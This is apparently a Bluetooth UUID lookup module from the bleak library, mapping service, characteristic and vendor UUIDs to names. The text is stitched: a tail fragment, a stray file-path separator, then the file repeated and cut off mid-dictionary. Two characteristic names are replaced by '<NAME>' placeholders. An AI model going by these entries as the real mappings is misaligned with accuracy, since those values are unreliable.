0xfe73: "St. Jude Medical: Inc.",
0xfe72: "St. Jude Medical: Inc.",
0xfe71: "Plume Design Inc",
0xfe70: "Beijing Jingdong Century Trading Co.: Ltd.",
0xfe6f: "LINE Corporation",
0xfe6e: "The University of Tokyo",
0xfe6d: "The University of Tokyo",
0xfe6c: "TASER International: Inc.",
0xfe6b: "TASER International: Inc.",
0xfe6a: "Kontakt Micro-Location Sp. z o.o.",
0xfe69: "Qualcomm Life Inc",
0xfe68: "Qualcomm Life Inc",
0xfe67: "Lab Sensor Solutions",
0xfe66: "Intel Corporation",
0xfe65: "CHIPOLO d.o.o.",
0xfe64: "Siemens AG",
0xfe63: "Connected Yard: Inc.",
0xfe62: "Indagem Tech LLC",
0xfe61: "Logitech International SA",
0xfe60: "Lierda Science & Technology Group Co.: Ltd.",
0xfe5F: "Eyefi: Inc.",
0xfe5E: "Plastc Corporation",
0xfe5D: "Grundfos A/S",
0xfe5C: "million hunters GmbH",
0xfe5B: "GT-tronics HK Ltd",
0xfe5A: "Chronologics Corporation",
0xfe59: "Nordic Semiconductor ASA",
0xfe58: "Nordic Semiconductor ASA",
0xfe57: "Dotted Labs",
0xfe56: "Google Inc.",
0xfe55: "Google Inc.",
0xfe54: "Motiv: Inc.",
0xfe53: "3M",
0xfe52: "SetPoint Medical",
0xfe51: "SRAM",
0xfe50: "Google Inc.",
0xfe4F: "Molekule: Inc.",
0xfe4E: "NTT docomo",
0xfe4D: "Casambi Technologies Oy",
0xfe4C: "Volkswagen AG",
0xfe4B: "Koninklijke Philips N.V.",
0xfe4A: "OMRON HEALTHCARE Co.: Ltd.",
0xfe49: "SenionLab AB",
0xfe48: "General Motors",
0xfe47: "General Motors",
0xfe46: "B&O Play A/S",
0xfe45: "Snapchat Inc",
0xfe44: "SK Telecom",
0xfe43: "Andreas Stihl AG & Co. KG",
0xfe42: "Nets A/S",
0xfe41: "Inugo Systems Limited",
0xfe40: "Inugo Systems Limited",
0xfe3F: "Friday Labs Limited",
0xfe3E: "BD Medical",
0xfe3D: "BD Medical",
0xfe3C: "Alibaba",
0xfe3B: "Dolby Laboratories",
0xfe3A: "TTS Tooltechnic Systems AG & Co. KG",
0xfe39: "TTS Tooltechnic Systems AG & Co. KG",
0xfe38: "Spaceek LTD",
0xfe37: "Spaceek LTD",
0xfe36: "HUAWEI Technologies Co.: Ltd",
0xfe35: "HUAWEI Technologies Co.: Ltd",
0xfe34: "SmallLoop LLC",
0xfe33: "CHIPOLO d.o.o.",
0xfe32: "Pro-Mark: Inc.",
0xfe31: "Volkswagen AG",
0xfe30: "Volkswagen AG",
0xfe2F: "CRESCO Wireless: Inc",
0xfe2E: "ERi,Inc.",
0xfe2D: "SMART INNOVATION Co.,Ltd",
0xfe2C: "Google Inc.",
0xfe2B: "ITT Industries",
0xfe2A: "DaisyWorks: Inc.",
0xfe29: "Gibson Innovations",
0xfe28: "Ayla Network",
0xfe27: "Google Inc.",
0xfe26: "Google Inc.",
0xfe25: "Apple: Inc.",
0xfe24: "August Home Inc",
0xfe23: "Zoll Medical Corporation",
0xfe22: "Zoll Medical Corporation",
0xfe21: "Bose Corporation",
0xfe20: "Emerson",
0xfe1F: "Garmin International: Inc.",
0xfe1E: "Smart Innovations Co.: Ltd",
0xfe1D: "Illuminati Instrument Corporation",
0xfe1C: "NetMedia: Inc.",
# SDO defined */
0xfffc: "AirFuel Alliance",
0xfffe: "Alliance for Wireless Power (A4WP)",
0xfffd: "Fast IDentity Online Alliance (FIDO)",
}
uuid128_dict = {
"a3c87500-8ed3-4bdf-8a39-a01bebede295": "Eddystone Configuration Service",
"a3c87501-8ed3-4bdf-8a39-a01bebede295": "Capabilities",
"a3c87502-8ed3-4bdf-8a39-a01bebede295": "Active Slot",
"a3c87503-8ed3-4bdf-8a39-a01bebede295": "Advertising Interval",
"a3c87504-8ed3-4bdf-8a39-a01bebede295": "Radio Tx Power",
"a3c87505-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Advertised Tx Power",
"a3c87506-8ed3-4bdf-8a39-a01bebede295": "Lock State",
"a3c87507-8ed3-4bdf-8a39-a01bebede295": "Unlock",
"a3c87508-8ed3-4bdf-8a39-a01bebede295": "Public ECDH Key",
"a3c87509-8ed3-4bdf-8a39-a01bebede295": "EID Identity Key",
"a3c8750a-8ed3-4bdf-8a39-a01bebede295": "ADV Slot Data",
"a3c8750b-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Factory reset",
"a3c8750c-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Remain Connectable",
# BBC micro:bit Bluetooth Profiles */
"e95d0753-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Service",
"e95dca4b-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Data",
"e95dfb24-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Period",
"e95df2d8-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Service",
"e95dfb11-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Data",
"e95d386c-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Period",
"e95d9715-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Bearing",
"e95d9882-251d-470a-a062-fa1922dfa9a8": "MicroBit Button Service",
"e95dda90-251d-470a-a062-fa1922dfa9a8": "MicroBit Button A State",
"e95dda91-251d-470a-a062-fa1922dfa9a8": "MicroBit Button B State",
"e95d127b-251d-470a-a062-fa1922dfa9a8": "MicroBit IO PIN Service",
"e95d8d00-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN Data",
"e95d5899-251d-470a-a062-fa1922dfa9a8": "MicroBit PIN AD Configuration",
"e95dd822-251d-470a-a062-fa1922dfa9a8": "MicroBit PWM Control",
"e95dd91d-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Service",
"e95d7b77-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Matrix state",
"e95d93ee-251d-470a-a062-fa1922dfa9a8": "MicroBit LED Text",
"e95d0d2d-251d-470a-a062-fa1922dfa9a8": "MicroBit Scrolling Delay",
"e95d93af-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Service",
"e95db84c-251d-470a-a062-fa1922dfa9a8": "MicroBit Requirements",
"e95d9775-251d-470a-a062-fa1922dfa9a8": "MicroBit Event Data",
"e95d23c4-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Requirements",
"e95d5404-251d-470a-a062-fa1922dfa9a8": "MicroBit Client Events",
"e95d93b0-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control Service" "",
"e95d93b1-251d-470a-a062-fa1922dfa9a8": "MicroBit DFU Control",
"e95d6100-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Service",
"e95d1b25-251d-470a-a062-fa1922dfa9a8": "MicroBit Temperature Period",
# Nordic UART Port Emulation */
"6e400001-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART Service",
"6e400002-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART TX",
"6e400003-b5a3-f393-e0a9-e50e24dcca9e": "Nordic UART RX",
}
def uuidstr_to_str(uuid_):
s = uuid128_dict.get(uuid_)
if s:
return s
if not s and uuid_.endswith("-0000-1000-8000-00805f9b34fb"):
s = "Vendor specific"
v = int(uuid_[:8], 16)
if (v & 0xffff0000) == 0x0000:
s = uuid16_dict.get(v & 0x0000ffff, s)
if not s:
return "Unknown"
return s | bleak/uuids.py |
uuid16_dict = {
0x0001: "SDP",
0x0003: "RFCOMM",
0x0005: "TCS-BIN",
0x0007: "ATT",
0x0008: "OBEX",
0x000f: "BNEP",
0x0010: "UPNP",
0x0011: "HIDP",
0x0012: "Hardcopy Control Channel",
0x0014: "Hardcopy Data Channel",
0x0016: "Hardcopy Notification",
0x0017: "AVCTP",
0x0019: "AVDTP",
0x001b: "CMTP",
0x001e: "MCAP Control Channel",
0x001f: "MCAP Data Channel",
0x0100: "L2CAP",
# 0x0101 to 0x0fff undefined */
0x1000: "Service Discovery Server Service Class",
0x1001: "Browse Group Descriptor Service Class",
0x1002: "Public Browse Root",
# 0x1003 to 0x1100 undefined */
0x1101: "Serial Port",
0x1102: "LAN Access Using PPP",
0x1103: "Dialup Networking",
0x1104: "IrMC Sync",
0x1105: "OBEX Object Push",
0x1106: "OBEX File Transfer",
0x1107: "IrMC Sync Command",
0x1108: "Headset",
0x1109: "Cordless Telephony",
0x110a: "Audio Source",
0x110b: "Audio Sink",
0x110c: "A/V Remote Control Target",
0x110d: "Advanced Audio Distribution",
0x110e: "A/V Remote Control",
0x110f: "A/V Remote Control Controller",
0x1110: "Intercom",
0x1111: "Fax",
0x1112: "Headset AG",
0x1113: "WAP",
0x1114: "WAP Client",
0x1115: "PANU",
0x1116: "NAP",
0x1117: "GN",
0x1118: "Direct Printing",
0x1119: "Reference Printing",
0x111a: "Basic Imaging Profile",
0x111b: "Imaging Responder",
0x111c: "Imaging Automatic Archive",
0x111d: "Imaging Referenced Objects",
0x111e: "Handsfree",
0x111f: "Handsfree Audio Gateway",
0x1120: "Direct Printing Refrence Objects Service",
0x1121: "Reflected UI",
0x1122: "Basic Printing",
0x1123: "Printing Status",
0x1124: "Human Interface Device Service",
0x1125: "Hardcopy Cable Replacement",
0x1126: "HCR Print",
0x1127: "HCR Scan",
0x1128: "Common ISDN Access",
# 0x1129 and 0x112a undefined */
0x112d: "SIM Access",
0x112e: "Phonebook Access Client",
0x112f: "Phonebook Access Server",
0x1130: "Phonebook Access",
0x1131: "Headset HS",
0x1132: "Message Access Server",
0x1133: "Message Notification Server",
0x1134: "Message Access Profile",
0x1135: "GNSS",
0x1136: "GNSS Server",
0x1137: "3D Display",
0x1138: "3D Glasses",
0x1139: "3D Synchronization",
0x113a: "MPS Profile",
0x113b: "MPS Service",
# 0x113c to 0x11ff undefined */
0x1200: "PnP Information",
0x1201: "Generic Networking",
0x1202: "Generic File Transfer",
0x1203: "Generic Audio",
0x1204: "Generic Telephony",
0x1205: "UPNP Service",
0x1206: "UPNP IP Service",
0x1300: "UPNP IP PAN",
0x1301: "UPNP IP LAP",
0x1302: "UPNP IP L2CAP",
0x1303: "Video Source",
0x1304: "Video Sink",
0x1305: "Video Distribution",
# 0x1306 to 0x13ff undefined */
0x1400: "HDP",
0x1401: "HDP Source",
0x1402: "HDP Sink",
# 0x1403 to 0x17ff undefined */
0x1800: "Generic Access Profile",
0x1801: "Generic Attribute Profile",
0x1802: "Immediate Alert",
0x1803: "Link Loss",
0x1804: "Tx Power",
0x1805: "Current Time Service",
0x1806: "Reference Time Update Service",
0x1807: "Next DST Change Service",
0x1808: "Glucose",
0x1809: "Health Thermometer",
0x180a: "Device Information",
# 0x180b and 0x180c undefined */
0x180d: "Heart Rate",
0x180e: "Phone Alert Status Service",
0x180f: "Battery Service",
0x1810: "Blood Pressure",
0x1811: "Alert Notification Service",
0x1812: "Human Interface Device",
0x1813: "Scan Parameters",
0x1814: "Running Speed and Cadence",
0x1815: "Automation IO",
0x1816: "Cycling Speed and Cadence",
# 0x1817 undefined */
0x1818: "Cycling Power",
0x1819: "Location and Navigation",
0x181a: "Environmental Sensing",
0x181b: "Body Composition",
0x181c: "User Data",
0x181d: "Weight Scale",
0x181e: "Bond Management",
0x181f: "Continuous Glucose Monitoring",
0x1820: "Internet Protocol Support",
0x1821: "Indoor Positioning",
0x1822: "Pulse Oximeter",
0x1823: "HTTP Proxy",
0x1824: "Transport Discovery",
0x1825: "Object Transfer",
0x1826: "Fitness Machine",
0x1827: "Mesh Provisioning",
0x1828: "Mesh Proxy",
# 0x1829 to 0x27ff undefined */
0x2800: "Primary Service",
0x2801: "Secondary Service",
0x2802: "Include",
0x2803: "Characteristic",
# 0x2804 to 0x28ff undefined */
0x2900: "Characteristic Extended Properties",
0x2901: "Characteristic User Description",
0x2902: "Client Characteristic Configuration",
0x2903: "Server Characteristic Configuration",
0x2904: "Characteristic Format",
0x2905: "Characteristic Aggregate Formate",
0x2906: "Valid Range",
0x2907: "External Report Reference",
0x2908: "Report Reference",
0x2909: "Number of Digitals",
0x290a: "Value Trigger Setting",
0x290b: "Environmental Sensing Configuration",
0x290c: "Environmental Sensing Measurement",
0x290d: "Environmental Sensing Trigger Setting",
0x290e: "Time Trigger Setting",
# 0x290f to 0x29ff undefined */
0x2a00: "Device Name",
0x2a01: "Appearance",
0x2a02: "Peripheral Privacy Flag",
0x2a03: "Reconnection Address",
0x2a04: "Peripheral Preferred Connection Parameters",
0x2a05: "Service Changed",
0x2a06: "Alert Level",
0x2a07: "Tx Power Level",
0x2a08: "Date Time",
0x2a09: "Day of Week",
0x2a0a: "Day Date Time",
# 0x2a0b undefined */
0x2a0c: "Exact Time 256",
0x2a0d: "DST Offset",
0x2a0e: "Time Zone",
0x2a0f: "Local Time Information",
# 0x2a10 undefined */
0x2a11: "Time with DST",
0x2a12: "Time Accuracy",
0x2a13: "Time Source",
0x2a14: "Reference Time Information",
# 0x2a15 undefined */
0x2a16: "Time Update Control Point",
0x2a17: "Time Update State",
0x2a18: "Glucose Measurement",
0x2a19: "Battery Level",
# 0x2a1a and 0x2a1b undefined */
0x2a1c: "Temperature Measurement",
0x2a1d: "Temperature Type",
0x2a1e: "Intermediate Temperature",
# 0x2a1f and 0x2a20 undefined */
0x2a21: "Measurement Interval",
0x2a22: "Boot Keyboard Input Report",
0x2a23: "System ID",
0x2a24: "Model Number String",
0x2a25: "Serial Number String",
0x2a26: "Firmware Revision String",
0x2a27: "Hardware Revision String",
0x2a28: "Software Revision String",
0x2a29: "Manufacturer Name String",
0x2a2a: "IEEE 11073-20601 Regulatory Cert. Data List",
0x2a2b: "Current Time",
0x2a2c: "Magnetic Declination",
# 0x2a2d to 0x2a30 undefined */
0x2a31: "Scan Refresh",
0x2a32: "Boot Keyboard Output Report",
0x2a33: "Boot Mouse Input Report",
0x2a34: "Glucose Measurement Context",
0x2a35: "Blood Pressure Measurement",
0x2a36: "Intermediate Cuff Pressure",
0x2a37: "Heart Rate Measurement",
0x2a38: "Body Sensor Location",
0x2a39: "Heart Rate Control Point",
# 0x2a3a to 0x2a3e undefined */
0x2a3f: "Alert Status",
0x2a40: "Ringer Control Point",
0x2a41: "Ringer Setting",
0x2a42: "Alert Category ID Bit Mask",
0x2a43: "Alert Category ID",
0x2a44: "Alert Notification Control Point",
0x2a45: "Unread Alert Status",
0x2a46: "New Alert",
0x2a47: "Supported New Alert Category",
0x2a48: "Supported Unread Alert Category",
0x2a49: "Blood Pressure Feature",
0x2a4a: "HID Information",
0x2a4b: "Report Map",
0x2a4c: "HID Control Point",
0x2a4d: "Report",
0x2a4e: "Protocol Mode",
0x2a4f: "Scan Interval Window",
0x2a50: "PnP ID",
0x2a51: "Glucose Feature",
0x2a52: "Record Access Control Point",
0x2a53: "RSC Measurement",
0x2a54: "RSC Feature",
0x2a55: "SC Control Point",
0x2a56: "Digital",
# 0x2a57 undefined */
0x2a58: "Analog",
# 0x2a59 undefined */
0x2a5a: "Aggregate",
0x2a5b: "CSC Measurement",
0x2a5c: "CSC Feature",
0x2a5d: "Sensor Location",
# 0x2a5e to 0x2a62 undefined */
0x2a63: "Cycling Power Measurement",
0x2a64: "Cycling Power Vector",
0x2a65: "Cycling Power Feature",
0x2a66: "Cycling Power Control Point",
0x2a67: "Location and Speed",
0x2a68: "Navigation",
0x2a69: "Position Quality",
0x2a6a: "LN Feature",
0x2a6b: "LN Control Point",
0x2a6c: "Elevation",
0x2a6d: "Pressure",
0x2a6e: "Temperature",
0x2a6f: "Humidity",
0x2a70: "True Wind Speed",
0x2a71: "True Wind Direction",
0x2a72: "Apparent Wind Speed",
0x2a73: "Apparent Wind Direction",
0x2a74: "Gust Factor",
0x2a75: "Pollen Concentration",
0x2a76: "UV Index",
0x2a77: "Irradiance",
0x2a78: "Rainfall",
0x2a79: "Wind Chill",
0x2a7a: "Heat Index",
0x2a7b: "Dew Point",
0x2a7c: "Trend",
0x2a7d: "Descriptor Value Changed",
0x2a7e: "Aerobic Heart Rate Lower Limit",
0x2a7f: "Aerobic Threshold",
0x2a80: "Age",
0x2a81: "Anaerobic Heart Rate Lower Limit",
0x2a82: "Anaerobic Heart Rate Upper Limit",
0x2a83: "Anaerobic Threshold",
0x2a84: "Aerobic Heart Rate Upper Limit",
0x2a85: "Date of Birth",
0x2a86: "Date of Threshold Assessment",
0x2a87: "Email Address",
0x2a88: "Fat Burn Heart Rate Lower Limit",
0x2a89: "Fat Burn Heart Rate Upper Limit",
0x2a8a: "<NAME>",
0x2a8b: "Five Zone Heart Rate Limits",
0x2a8c: "Gender",
0x2a8d: "Heart Rate Max",
0x2a8e: "Height",
0x2a8f: "Hip Circumference",
0x2a90: "<NAME>",
0x2a91: "Maximum Recommended Heart Rate",
0x2a92: "Resting Heart Rate",
0x2a93: "Sport Type for Aerobic/Anaerobic Thresholds",
0x2a94: "Three Zone Heart Rate Limits",
0x2a95: "Two Zone Heart Rate Limit",
0x2a96: "VO2 Max",
0x2a97: "Waist Circumference",
0x2a98: "Weight",
0x2a99: "Database Change Increment",
0x2a9a: "User Index",
0x2a9b: "Body Composition Feature",
0x2a9c: "Body Composition Measurement",
0x2a9d: "Weight Measurement",
0x2a9e: "Weight Scale Feature",
0x2a9f: "User Control Point",
0x2aa0: "Magnetic Flux Density - 2D",
0x2aa1: "Magnetic Flux Density - 3D",
0x2aa2: "Language",
0x2aa3: "Barometric Pressure Trend",
0x2aa4: "Bond Management Control Point",
0x2aa5: "Bond Management Feature",
0x2aa6: "Central Address Resolution",
0x2aa7: "CGM Measurement",
0x2aa8: "CGM Feature",
0x2aa9: "CGM Status",
0x2aaa: "CGM Session Start Time",
0x2aab: "CGM Session Run Time",
0x2aac: "CGM Specific Ops Control Point",
0x2aad: "Indoor Positioning Configuration",
0x2aae: "Latitude",
0x2aaf: "Longitude",
0x2ab0: "Local North Coordinate",
0x2ab1: "Local East Coordinate",
0x2ab2: "Floor Number",
0x2ab3: "Altitude",
0x2ab4: "Uncertainty",
0x2ab5: "Location Name",
0x2ab6: "URI",
0x2ab7: "HTTP Headers",
0x2ab8: "HTTP Status Code",
0x2ab9: "HTTP Entity Body",
0x2aba: "HTTP Control Point",
0x2abb: "HTTPS Security",
0x2abc: "TDS Control Point",
0x2abd: "OTS Feature",
0x2abe: "Object Name",
0x2abf: "Object Type",
0x2ac0: "Object Size",
0x2ac1: "Object First-Created",
0x2ac2: "Object Last-Modified",
0x2ac3: "Object ID",
0x2ac4: "Object Properties",
0x2ac5: "Object Action Control Point",
0x2ac6: "Object List Control Point",
0x2ac7: "Object List Filter",
0x2ac8: "Object Changed",
0x2ac9: "Resolvable Private Address Only",
# 0x2aca and 0x2acb undefined */
0x2acc: "Fitness Machine Feature",
0x2acd: "Treadmill Data",
0x2ace: "Cross Trainer Data",
0x2acf: "Step Climber Data",
0x2ad0: "Stair Climber Data",
0x2ad1: "Rower Data",
0x2ad2: "Indoor Bike Data",
0x2ad3: "Training Status",
0x2ad4: "Supported Speed Range",
0x2ad5: "Supported Inclination Range",
0x2ad6: "Supported Resistance Level Range",
0x2ad7: "Supported Heart Rate Range",
0x2ad8: "Supported Power Range",
0x2ad9: "Fitness Machine Control Point",
0x2ada: "Fitness Machine Status",
0x2adb: "Mesh Provisioning Data In",
0x2adc: "Mesh Provisioning Data Out",
0x2add: "Mesh Proxy Data In",
0x2ade: "Mesh Proxy Data Out",
# vendor defined */
0xfeff: "GN Netcom",
0xfefe: "GN ReSound A/S",
0xfefd: "Gimbal: Inc.",
0xfefc: "Gimbal: Inc.",
0xfefb: "Stollmann E+V GmbH",
0xfefa: "PayPal: Inc.",
0xfef9: "PayPal: Inc.",
0xfef8: "Aplix Corporation",
0xfef7: "Aplix Corporation",
0xfef6: "Wicentric: Inc.",
0xfef5: "Dialog Semiconductor GmbH",
0xfef4: "Google",
0xfef3: "Google",
0xfef2: "CSR",
0xfef1: "CSR",
0xfef0: "Intel",
0xfeef: "Polar Electro Oy",
0xfeee: "Polar Electro Oy",
0xfeed: "Tile: Inc.",
0xfeec: "Tile: Inc.",
0xfeeb: "Swirl Networks: Inc.",
0xfeea: "Swirl Networks: Inc.",
0xfee9: "Quintic Corp.",
0xfee8: "Quintic Corp.",
0xfee7: "Tencent Holdings Limited",
0xfee6: "Seed Labs: Inc.",
0xfee5: "Nordic Semiconductor ASA",
0xfee4: "Nordic Semiconductor ASA",
0xfee3: "Anki: Inc.",
0xfee2: "Anki: Inc.",
0xfee1: "Anhui Huami Information Technology Co.",
0xfee0: "Anhui Huami Information Technology Co.",
0xfedf: "Design SHIFT",
0xfede: "Coin: Inc.",
0xfedd: "Jawbone",
0xfedc: "Jawbone",
0xfedb: "Perka: Inc.",
0xfeda: "ISSC Technologies Corporation",
0xfed9: "Pebble Technology Corporation",
0xfed8: "Google",
0xfed7: "Broadcom Corporation",
0xfed6: "Broadcom Corporation",
0xfed5: "Plantronics Inc.",
0xfed4: "Apple: Inc.",
0xfed3: "Apple: Inc.",
0xfed2: "Apple: Inc.",
0xfed1: "Apple: Inc.",
0xfed0: "Apple: Inc.",
0xfecf: "Apple: Inc.",
0xfece: "Apple: Inc.",
0xfecd: "Apple: Inc.",
0xfecc: "Apple: Inc.",
0xfecb: "Apple: Inc.",
0xfeca: "Apple: Inc.",
0xfec9: "Apple: Inc.",
0xfec8: "Apple: Inc.",
0xfec7: "Apple: Inc.",
0xfec6: "Kocomojo: LLC",
0xfec5: "Realtek Semiconductor Corp.",
0xfec4: "PLUS Location Systems",
0xfec3: "360fly: Inc.",
0xfec2: "Blue Spark Technologies: Inc.",
0xfec1: "KDDI Corporation",
0xfec0: "KDDI Corporation",
0xfebf: "Nod: Inc.",
0xfebe: "Bose Corporation",
0xfebd: "Clover Network: Inc.",
0xfebc: "Dexcom: Inc.",
0xfebb: "adafruit industries",
0xfeba: "Tencent Holdings Limited",
0xfeb9: "LG Electronics",
0xfeb8: "Facebook: Inc.",
0xfeb7: "Facebook: Inc.",
0xfeb6: "Vencer Co: Ltd",
0xfeb5: "WiSilica Inc.",
0xfeb4: "WiSilica Inc.",
0xfeb3: "Taobao",
0xfeb2: "Microsoft Corporation",
0xfeb1: "Electronics Tomorrow Limited",
0xfeb0: "Nest Labs Inc.",
0xfeaf: "Nest Labs Inc.",
0xfeae: "Nokia Corporation",
0xfead: "Nokia Corporation",
0xfeac: "Nokia Corporation",
0xfeab: "Nokia Corporation",
0xfeaa: "Google",
0xfea9: "Savant Systems LLC",
0xfea8: "Savant Systems LLC",
0xfea7: "UTC Fire and Security",
0xfea6: "GoPro: Inc.",
0xfea5: "GoPro: Inc.",
0xfea4: "Paxton Access Ltd",
0xfea3: "ITT Industries",
0xfea2: "Intrepid Control Systems: Inc.",
0xfea1: "Intrepid Control Systems: Inc.",
0xfea0: "Google",
0xfe9f: "Google",
0xfe9e: "Dialog Semiconductor B.V.",
0xfe9d: "Mobiquity Networks Inc",
0xfe9c: "GSI Laboratories: Inc.",
0xfe9b: "Samsara Networks: Inc",
0xfe9a: "Estimote",
0xfe99: "Currant: Inc.",
0xfe98: "Currant: Inc.",
0xfe97: "Tesla Motor Inc.",
0xfe96: "Tesla Motor Inc.",
0xfe95: "Xiaomi Inc.",
0xfe94: "OttoQ Inc.",
0xfe93: "OttoQ Inc.",
0xfe92: "Jarden Safety & Security",
0xfe91: "Shanghai Imilab Technology Co.,Ltd",
0xfe90: "JUMA",
0xfe8f: "CSR",
0xfe8e: "ARM Ltd",
0xfe8d: "Interaxon Inc.",
0xfe8c: "TRON Forum",
0xfe8b: "Apple: Inc.",
0xfe8a: "Apple: Inc.",
0xfe89: "B&O Play A/S",
0xfe88: "SALTO SYSTEMS S.L.",
0xfe87: "Qingdao Yeelink Information Technology Co.: Ltd. ( 青岛亿联客信息技术有限公司 )",
0xfe86: "HUAWEI Technologies Co.: Ltd. ( 华为技术有限公司 )",
0xfe85: "RF Digital Corp",
0xfe84: "RF Digital Corp",
0xfe83: "Blue Bite",
0xfe82: "Medtronic Inc.",
0xfe81: "Medtronic Inc.",
0xfe80: "Doppler Lab",
0xfe7f: "Doppler Lab",
0xfe7e: "Awear Solutions Ltd",
0xfe7d: "Aterica Health Inc.",
0xfe7c: "Stollmann E+V GmbH",
0xfe7b: "Orion Labs: Inc.",
0xfe7a: "Bragi GmbH",
0xfe79: "Zebra Technologies",
0xfe78: "Hewlett-Packard Company",
0xfe77: "Hewlett-Packard Company",
0xfe76: "TangoMe",
0xfe75: "TangoMe",
0xfe74: "unwire",
0xfe73: "St. Jude Medical: Inc.",
0xfe72: "St. Jude Medical: Inc.",
0xfe71: "Plume Design Inc",
0xfe70: "Beijing Jingdong Century Trading Co.: Ltd.",
0xfe6f: "LINE Corporation",
0xfe6e: "The University of Tokyo",
0xfe6d: "The University of Tokyo",
0xfe6c: "TASER International: Inc.",
0xfe6b: "TASER International: Inc.",
0xfe6a: "Kontakt Micro-Location Sp. z o.o.",
0xfe69: "Qualcomm Life Inc",
0xfe68: "Qualcomm Life Inc",
0xfe67: "Lab Sensor Solutions",
0xfe66: "Intel Corporation",
0xfe65: "CHIPOLO d.o.o.",
0xfe64: "Siemens AG",
0xfe63: "Connected Yard: Inc.",
0xfe62: "Indagem Tech LLC",
0xfe61: "Logitech International SA",
0xfe60: "Lierda Science & Technology Group Co.: Ltd.",
0xfe5F: "Eyefi: Inc.",
0xfe5E: "Plastc Corporation",
0xfe5D: "Grundfos A/S",
0xfe5C: "million hunters GmbH",
0xfe5B: "GT-tronics HK Ltd",
0xfe5A: "Chronologics Corporation",
0xfe59: "Nordic Semiconductor ASA",
0xfe58: "Nordic Semiconductor ASA",
0xfe57: "Dotted Labs",
0xfe56: "Google Inc.",
0xfe55: "Google Inc.",
0xfe54: "Motiv: Inc.",
0xfe53: "3M",
0xfe52: "SetPoint Medical",
0xfe51: "SRAM",
0xfe50: "Google Inc.",
0xfe4F: "Molekule: Inc.",
0xfe4E: "NTT docomo",
0xfe4D: "Casambi Technologies Oy",
0xfe4C: "Volkswagen AG",
0xfe4B: "Koninklijke Philips N.V.",
0xfe4A: "OMRON HEALTHCARE Co.: Ltd.",
0xfe49: "SenionLab AB",
0xfe48: "General Motors",
0xfe47: "General Motors",
0xfe46: "B&O Play A/S",
0xfe45: "Snapchat Inc",
0xfe44: "SK Telecom",
0xfe43: "Andreas Stihl AG & Co. KG",
0xfe42: "Nets A/S",
0xfe41: "Inugo Systems Limited",
0xfe40: "Inugo Systems Limited",
0xfe3F: "Friday Labs Limited",
0xfe3E: "BD Medical",
0xfe3D: "BD Medical",
0xfe3C: "Alibaba",
0xfe3B: "Dolby Laboratories",
0xfe3A: "TTS Tooltechnic Systems AG & Co. KG",
0xfe39: "TTS Tooltechnic Systems AG & Co. KG",
0xfe38: "Spaceek LTD",
0xfe37: "Spaceek LTD",
0xfe36: "HUAWEI Technologies Co.: Ltd",
0xfe35: "HUAWEI Technologies Co.: Ltd",
0xfe34: "SmallLoop LLC",
0xfe33: "CHIPOLO d.o.o.",
0xfe32: "Pro-Mark: Inc.",
0xfe31: "Volkswagen AG",
0xfe30: "Volkswagen AG",
0xfe2F: "CRESCO Wireless: Inc",
0xfe2E: "ERi,Inc.",
0xfe2D: "SMART INNOVATION Co.,Ltd",
0xfe2C: "Google Inc.",
0xfe2B: "ITT Industries",
0xfe2A: "DaisyWorks: Inc.",
0xfe29: "Gibson Innovations",
0xfe28: "Ayla Network",
0xfe27: "Google Inc.",
0xfe26: "Google Inc.",
0xfe25: "Apple: Inc.",
0xfe24: "August Home Inc",
0xfe23: "Zoll Medical Corporation",
0xfe22: "Zoll Medical Corporation",
0xfe21: "Bose Corporation",
0xfe20: "Emerson",
0xfe1F: "Garmin International: Inc.",
0xfe1E: "Smart Innovations Co.: Ltd",
0xfe1D: "Illuminati Instrument Corporation",
0xfe1C: "NetMedia: Inc.",
# SDO defined */
0xfffc: "AirFuel Alliance",
0xfffe: "Alliance for Wireless Power (A4WP)",
0xfffd: "Fast IDentity Online Alliance (FIDO)",
}
uuid128_dict = {
"a3c87500-8ed3-4bdf-8a39-a01bebede295": "Eddystone Configuration Service",
"a3c87501-8ed3-4bdf-8a39-a01bebede295": "Capabilities",
"a3c87502-8ed3-4bdf-8a39-a01bebede295": "Active Slot",
"a3c87503-8ed3-4bdf-8a39-a01bebede295": "Advertising Interval",
"a3c87504-8ed3-4bdf-8a39-a01bebede295": "Radio Tx Power",
"a3c87505-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Advertised Tx Power",
"a3c87506-8ed3-4bdf-8a39-a01bebede295": "Lock State",
"a3c87507-8ed3-4bdf-8a39-a01bebede295": "Unlock",
"a3c87508-8ed3-4bdf-8a39-a01bebede295": "Public ECDH Key",
"a3c87509-8ed3-4bdf-8a39-a01bebede295": "EID Identity Key",
"a3c8750a-8ed3-4bdf-8a39-a01bebede295": "ADV Slot Data",
"a3c8750b-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Factory reset",
"a3c8750c-8ed3-4bdf-8a39-a01bebede295": "(Advanced) Remain Connectable",
# BBC micro:bit Bluetooth Profiles */
"e95d0753-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Service",
"e95dca4b-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Data",
"e95dfb24-251d-470a-a062-fa1922dfa9a8": "MicroBit Accelerometer Period",
"e95df2d8-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Service",
"e95dfb11-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Data",
"e95d386c-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Period",
"e95d9715-251d-470a-a062-fa1922dfa9a8": "MicroBit Magnetometer Bearing",
